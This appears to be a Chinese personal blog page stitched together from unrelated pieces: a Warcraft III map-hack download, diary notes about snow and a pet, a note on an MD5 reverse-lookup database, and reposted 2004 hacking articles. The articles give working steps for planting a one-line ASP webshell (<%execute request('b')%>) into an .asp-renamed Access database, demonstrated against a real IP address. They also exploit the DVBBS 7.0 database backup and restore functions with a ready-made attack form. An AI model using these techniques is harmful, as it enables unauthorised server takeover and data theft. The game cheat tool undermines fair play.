网虫's blog

此次有两个文件，Wa3MapHack12101.zip和Wa3MapHack120E5.zip

Wa3MapHack12101.zip是支持1.21最新的版
[attach=277]

Wa3MapHack120E5.zip是支持1.20e最终版


使用方法：进入魔兽争霸3：冰峰王座后按Alt+Tab切换出来打开作弊器，点击左下角的ON即可。若要关闭作弊器请点击OFF。

       我们这里那天下了好大的一场雪，可是很快就不下了，我好失望，我还以为我们今年又会看到好大 一场呢？好 久没有看到了，而且下雪也不会很冷。那天他没有带伞成了一雪人，我是又好笑又心疼，因为我已经打电话和他说了的他又不听话。

         毛毛也很烦了呢。它到处拉巴，其实它很可爱的就是这一点不好，他说我不爱它怎么会呢/我很爱它的哦。因为它是我们两的嘛，我当然喜欢了，笨哦。

有PHP+MYSQL和ASP+ACCESS的。

PHP的是空数据库，里面没有任何数据， 通过查询后自动纪录，也就是只要在你站点加过密的MD5都会自动纪录到数据库里了。遗憾的是只支持32位的加密反查询，不支持16位。

ASP的也是空数据，不过有点好处。它可以在后台自动生成数据库，但只局限于数字，如果带字母或者符号只能手动添加进去或者已经有人使用过加密自动纪录了。

本文作者：SuperHei·Lilo
文章性质：原创
发布日期：2004-09-16
　　可能是随着网络安全技术的发展吧，管理员的素质都在提高，在使用access+asp系统时，为不数据库被人下载，到把mdb改为asp或asa。先不说直接改后缀，直接可以用网快等工具直接下载，其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。

一．思路

　　大家都知道<％%>为asp文件的标志符，也就是说一个asp文件只会去执行<% %>之间的代码，access＋asp的web系统的所有数据都是存放在数据库文件里（mdb文件），由于管理者把mdb文件改为了asp文件，如果我们提交的数据里包含有<%%>，那当我们访问这个asp数据库的时候就会去执行<%%>之间的代码。这样导致我们只提交恶意代码给数据库，那么asp后缀的数据库就是我们的webshell了。

二．示例

　　随便找个目标，首先我们暴库，看是不是asp后缀的数据库：
http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210

返回：

Microsoft VBScript 编译器错误 错误 '800a03f6' 
缺少 'End'


/iisHelp/common/500-100.asp，行242


Microsoft JET Database Engine 错误 '80004005'


'D:\log_mdb\%29dlog_mdb%29.asp'不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。


/test/conn.asp，行18
 

　　我们提交：http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp返回一堆的乱码，这样我们可以直接用网际快车等工具直接下载数据库（这里我们不讨论）。我们回到主页看到有提供“网友评论”功能。我们注册个用户，发一条评论：

< %execute request("b")%>

　　这样我们就把asp代码：<%execute request("b")%>写入了数据库，那么数据库：就是我们的webshell咯。提交：http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp在乱码的最后我们看到：

/iisHelp/common/500-100.asp，行242 
Microsoft VBScript 运行时错误 错误 '800a000d'


类型不匹配: 'execute'


/test/dlog/log_mdb/%29dlog_mdb%29.asp，行1266
 

　　哈哈，我们的插入的代码运行了。如下图：

　　注意：我们在向数据库提交代码时，代码内容不可以太大。所以我们采用<%execute request("b")%>。

三．其他一些问题和思路

　　１．对于改了后缀为asp，还对数据库里加入了<%=’a’-1%>等非法的asp代码来彻底防止下载的数据库，由于里面存在了非法的asp代码，插入我们的webshell代码后运行，将只会显示前面非法代码的错误，而不去执行我们shell的代码。虽然这样可以防止一定的攻击，但还是存在一定的隐患，我们只要在出错的代码前加入兼容错误的代码，就可以得到正确显示执行我们插入的webshell代码了。

　　２．对于没有改后缀的，也就是mdb文件，这样我们可以先直接下载下来得到后台密码，进了后台，可以利用数据库备用改后缀为asp。

本文作者：angel
文章性质：原创
发布日期：2004-06-27
发现：Super·Hei
分析：angel
环境/讨论：xiaolu
起哄：knife

前言

　　Super·Hei和我提起《Backup a shell》这篇文章，就和我说，按照这个文章的方法，有没有办法拿到动网论坛上利用，因为DVBBS7.0即使设置允许上传asp文件，实际上也是无法上传的，既然能够去后台设置允许上传文件类型，那何不利用这个方法去备份一个WebShell，我们发帖子写入特制的WebShell的代码，然后备份一下，不就有WebShell了吗？那能不能用到ACCESS数据库里？实验证明这个是不可行的，但是Super·Hei又告诉我另外一个方法，由于他要考试，所以由我来分析并写出来，我转行PHP很久了，所以这次分析DVBBS可能有不足的地方，还请各位高手赐教。

注意：如何进入后台，不是本文讨论范围，局限就在这，靠大家自己发挥了。

ACCESS版的分析

　　首先我们看看admin_data.asp文件的updata()函数：
sub updata() 
             Dbpath=request.form("Dbpath") 
             Dbpath=server.mappath(Dbpath) 
             bkfolder=request.form("bkfolder") 
             bkdbname=request.form("bkdbname") 
             Set Fso=server.createobject("scripting.filesystemobject") 
             if fso.fileexists(dbpath) then 
                 If CheckDir(bkfolder) = True Then 
                 fso.copyfile dbpath,bkfolder& "\"& bkdbname 
                 else 
                 MakeNewsDir bkfolder 
                 fso.copyfile dbpath,bkfolder& ""& bkdbname 
                 end if 
                 response.write "备份数据库成功，您备份的数据库路径为" &bkfolder& ""& bkdbname 
             Else 
                 response.write "找不到您所需要备份的文件。" 
             End if 
end sub

　　上面的代码就是执行备份操作的函数，已经很易懂了，只要Dbpath存在，就直接把数据库复制到指定目录，可能开发者以为入侵者无法进入后台(万一骗来或监听到的呢)，所以并不对这个地方进行检查，没有检查是否为真正的数据库，所以我们就可以利用这里复制我们上传的“图片”。

ACCESS版的利用

　　我们在发帖那上传一个写有asp代码的假图片，然后记住其上传路径，比如UploadFile/2004-6/20046272411024.jpg，然后进入后台的“备份数据库”那，按照下面的格式填写：

　　当前数据库路径(相对路径)：UploadFile/2004-6/20046272411024.jpg
　　备份数据库目录(相对路径)：随便找个目录
　　备份数据库名称(填写名称)：改为webshell.asp

　　然后提交就可以得到WebShell了。

SQL版的分析

　　还是备份数据的地方，你别看这里教你如何用SQL企业管理器来操作，其实可利用的正在里面，不要被表面的现象蒙蔽了，我们看看admin_data.asp文件的以下代码：
case "RestoreData"             '恢复数据 
     admin_flag=",32," 
     dim backpath 
     if not Dvbbs.master or instr(","&session("flag")&",",admin_flag)=0 then 
             Errmsg=ErrMsg + "<BR><li>本页面为管理员专用，请<a href=admin_index.asp target=_top>登录</a>后进入。<br><li>您没有管理本页面的权限。" 
             dvbbs_error() 
     else 
             if request("act")="Restore" then 
                 Dbpath=request.form("Dbpath") 
                 backpath=request.form("backpath") 
                 if dbpath="" then 
                 response.write "请输入您要恢复成的数据库全名"         
                 else 
                 Dbpath=server.mappath(Dbpath) 
                 end if 
                 backpath=server.mappath(backpath) 
             
                 Set Fso=server.createobject("scripting.filesystemobject") 
                 if fso.fileexists(dbpath) then                                 
                 fso.copyfile Dbpath,Backpath 
                 response.write "成功恢复数据！" 
                 else 
                 response.write "备份目录下并无您的备份文件！"         
                 end if 
             else 
             
             call RestoreData() 
             end if 
     end if

　　在后台没有用到这些代码，可以看出我们完全可以用像ACCESS的方法来利用，只是要从本地提交参数，因为Dbpath、backpath那两个变量是用request.form取值。照样没有检查文件类型，这个文件的很多代码在SQL版里都是多余！由此产生安全隐患。这个漏洞的原理和ACCESS版的一样，也就不多分析了。

SQL版的利用

　　还是在发帖那上传一个写有asp代码的假图片，然后记住其上传路径，比如UploadFile/2004-6/20046272411024.jpg，写一个本地提交的表单，代码如下：

<form action="http://[target_url]/admin_data.asp?action=RestoreData&act=Restore" method="post"> 
<p>已上传文件的位置：<input name="Dbpath" type="text" size="80"></p> 
<p>要复制到的位置：<input name="backpath" type="text" size="80"></p> 
<p><input type="submit" value="提交"></p> 
</form>

　　然后就把UploadFile/2004-6/20046272411024.jpg填在“已上传文件的位置”那里，想要在哪里搞个WebShell就把完整的相对路径填写在“要复制到的位置”那里，比如：images/angel.asp提交就得到我们可爱的WebShell了，

解决方案

　　由于我放开ASP转向PHP很久了，所以不能提供很好的解决方案，只能给出个思路，由于利用局限比较大，所以大家如果不会修补，可以等官方的补丁出来。

　　针对ACCESS版的，可以对要备份的文件进行格式检查或内容检查，看是否为ASCII文件，再执行操作。
　　针对SQL版的，可以把那些毫无作用的代码去掉，只留个说明好了。

后记

　　感谢Super·Hei提出他ACCESS版的思路，我才得以分析，感谢xiaolu提供两个版本的论坛供我分析测试，并参与SQL版的讨论，本文版权由Bugkidz和Security Angel两个安全组织共同所有。转载请注明！

主要说的是有后台权限的情况下取得WebShell的方法。

Access：
通过博客（boke）上传程序上传插入了ASP木马的MDB数据库后通过后台备份改名。

Sql：
通过博客（boke）上传程序上传插入了ASP木马的MDB数据库后通过提交程序备份数据库。

以下是代码：
<form action="http://www.xxx.com/bbs/admin/data.asp?action=RestoreData&act=Restore" method="post"> 
<p>已上传文件的位置：<input name="Dbpath" type="text" size="80"></p> 
<p>要复制到的位置：<input name="backpath" type="text" size="80"></p> 
<p><input type="submit" value="提交"></p> 
</form>
更多详细情况请参考ANGEL的《动网论坛7.0获得WebShell的分析》。

注：为什么不通过个人头像和发表帖子上传文件呢？因为那些方式在大部分Dvbbs7.1中都已经无法上传ASP的假图片了，而且即使能上传也无法通过后台的备份来改木马名。